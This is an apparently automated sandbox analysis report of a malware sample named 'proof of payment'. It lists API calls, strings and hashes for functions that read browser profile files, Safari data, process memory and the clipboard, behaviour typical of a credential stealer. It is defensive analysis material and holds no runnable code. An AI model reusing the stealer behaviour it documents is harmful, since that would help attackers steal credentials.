                                      Uniqueness Score: -1.00%

                                      Function 00415B2C Relevance: 1.3, APIs: 1, Instructions: 62COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                                      • Instruction ID: 56811e6a31311fae19106e74f332fd481794b0d175407c03959d21f12539f693
                                      • Opcode Fuzzy Hash: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                                      • Instruction Fuzzy Hash: 4201E572109E01E6DB1029278C81AF766899FC0399F14016FF94886281EEA8EEC542AE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 00445426
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                      • String ID:
                                      • API String ID: 1828521557-0
                                      • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                      • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                      • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                      • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _wcsicmp
                                      • String ID:
                                      • API String ID: 2081463915-0
                                      • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                      • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                      • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                      • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                      • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: File$CloseCreateErrorHandleLastRead
                                      • String ID:
                                      • API String ID: 2136311172-0
                                      • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                      • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                      • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                      • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??2@??3@
                                      • String ID:
                                      • API String ID: 1936579350-0
                                      • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                      • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                      • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                      • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • EmptyClipboard.USER32 ref: 004098EC
                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                      • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                      • GlobalFix.KERNEL32(00000000), ref: 00409927
                                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                      • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                      • GetLastError.KERNEL32 ref: 0040995D
                                      • CloseHandle.KERNEL32(?), ref: 00409969
                                      • GetLastError.KERNEL32 ref: 00409974
                                      • CloseClipboard.USER32 ref: 0040997D
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                      • String ID:
                                      • API String ID: 2565263379-0
                                      • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                      • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                      • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                      • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • EmptyClipboard.USER32 ref: 00409882
                                      • wcslen.MSVCRT ref: 0040988F
                                      • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                      • GlobalFix.KERNEL32(00000000), ref: 004098AC
                                      • memcpy.MSVCRT ref: 004098B5
                                      • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                      • CloseClipboard.USER32 ref: 004098D7
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                                      • String ID:
                                      • API String ID: 2014503067-0
                                      • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                      • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                      • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                      • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32 ref: 004182D7
                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                      • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                      • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                      • LocalFree.KERNEL32(?), ref: 00418342
                                      • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                        • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,76F8DF80,?,0041755F,?), ref: 00417452
                                        • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                      • String ID: OsError 0x%x (%u)
                                      • API String ID: 403622227-2664311388
                                      • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                      • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                      • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                      • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00401806 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??2@??3@memcpymemset
                                      • String ID:
                                      • API String ID: 1865533344-0
                                      • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                      • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                      • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                      • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041739B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetVersionExW.KERNEL32(?), ref: 004173BE
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Version
                                      • String ID:
                                      • API String ID: 1889659487-0
                                      • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                      • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                      • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                      • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004018C0 Relevance: 1.5, APIs: 1, Instructions: 6nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: NtdllProc_Window
                                      • String ID:
                                      • API String ID: 4255912815-0
                                      • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                      • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                      • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                      • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcsicmp.MSVCRT ref: 004022A6
                                      • _wcsicmp.MSVCRT ref: 004022D7
                                      • _wcsicmp.MSVCRT ref: 00402305
                                      • _wcsicmp.MSVCRT ref: 00402333
                                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                        • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                      • memset.MSVCRT ref: 0040265F
                                      • memcpy.MSVCRT ref: 0040269B
                                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                      • memcpy.MSVCRT ref: 004026FF
                                      • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                      • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                      • API String ID: 577499730-1134094380
                                      • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                      • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                      • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                      • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                      • String ID: :stringdata$ftp://$http://$https://
                                      • API String ID: 2787044678-1921111777
                                      • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                      • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                      • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                      • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                      • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                      • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                      • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                      • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                      • GetWindowRect.USER32(?,?), ref: 00414088
                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                      • GetDC.USER32 ref: 004140E3
                                      • wcslen.MSVCRT ref: 00414123
                                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                      • ReleaseDC.USER32(?,?), ref: 00414181
                                      • _snwprintf.MSVCRT ref: 00414244
                                      • SetWindowTextW.USER32(?,?), ref: 00414258
                                      • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                      • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                      • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                      • GetClientRect.USER32(?,?), ref: 004142E1
                                      • GetWindowRect.USER32(?,?), ref: 004142EB
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                      • GetClientRect.USER32(?,?), ref: 0041433B
                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                      • String ID: %s:$EDIT$STATIC
                                      • API String ID: 2080319088-3046471546
                                      • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                      • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                      • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                      • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • EndDialog.USER32(?,?), ref: 00413221
                                      • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                      • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                      • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                      • memset.MSVCRT ref: 00413292
                                      • memset.MSVCRT ref: 004132B4
                                      • memset.MSVCRT ref: 004132CD
                                      • memset.MSVCRT ref: 004132E1
                                      • memset.MSVCRT ref: 004132FB
                                      • memset.MSVCRT ref: 00413310
                                      • GetCurrentProcess.KERNEL32 ref: 00413318
                                      • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                      • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                      • memset.MSVCRT ref: 004133C0
                                      • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                      • memcpy.MSVCRT ref: 004133FC
                                      • wcscpy.MSVCRT ref: 0041341F
                                      • _snwprintf.MSVCRT ref: 0041348E
                                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                      • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                      • SetFocus.USER32(00000000), ref: 004134B7
                                      Strings
                                      • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                      • {Unknown}, xrefs: 004132A6
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                      • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                      • API String ID: 4111938811-1819279800
                                      • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                      • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                      • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                      • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                      • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                      • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                      • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                      • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                      • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                      • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                      • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                      • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                      • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                      • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                      • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                      • EndDialog.USER32(?,?), ref: 0040135E
                                      • DeleteObject.GDI32(?), ref: 0040136A
                                      • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                      • ShowWindow.USER32(00000000), ref: 00401398
                                      • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                      • ShowWindow.USER32(00000000), ref: 004013A7
                                      • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                      • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                      • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                      • String ID:
                                      • API String ID: 829165378-0
                                      • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                      • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                      • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                      • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 00404172
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                      • wcscpy.MSVCRT ref: 004041D6
                                      • wcscpy.MSVCRT ref: 004041E7
                                      • memset.MSVCRT ref: 00404200
                                      • memset.MSVCRT ref: 00404215
                                      • _snwprintf.MSVCRT ref: 0040422F
                                      • wcscpy.MSVCRT ref: 00404242
                                      • memset.MSVCRT ref: 0040426E
                                      • memset.MSVCRT ref: 004042CD
                                      • memset.MSVCRT ref: 004042E2
                                      • _snwprintf.MSVCRT ref: 004042FE
                                      • wcscpy.MSVCRT ref: 00404311
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                      • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                      • API String ID: 2454223109-1580313836
                                      • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                      • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                      • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                      • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                      • SetMenu.USER32(?,00000000), ref: 00411453
                                      • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
